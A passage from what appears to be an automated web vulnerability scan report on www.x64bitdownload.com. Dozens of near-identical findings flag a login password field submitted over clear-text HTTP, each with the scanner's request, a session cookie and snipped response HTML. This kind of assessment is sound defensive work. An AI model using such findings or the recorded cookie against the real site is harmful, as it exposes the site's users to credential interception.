Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.240. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.241. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.242. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.243. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.244. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.245. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.246. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /contact.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.247. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.248. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.249. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.250. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.251. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.252. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.253. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.254. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.255. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.256. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.257. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.258. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

6.259. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.260. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.261. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.262. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.263. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.264. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.265. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.266. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.267. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.268. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.269. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.270. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.271. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.272. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.273. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.274. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.275. http://www.x64bitdownload.com/drivers/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /drivers/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.276. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /drivers/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.277. http://www.x64bitdownload.com/featured-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /featured-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.278. http://www.x64bitdownload.com/linktous.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /linktous.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.279. http://www.x64bitdownload.com/new-reviews.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-reviews.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /new-reviews.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

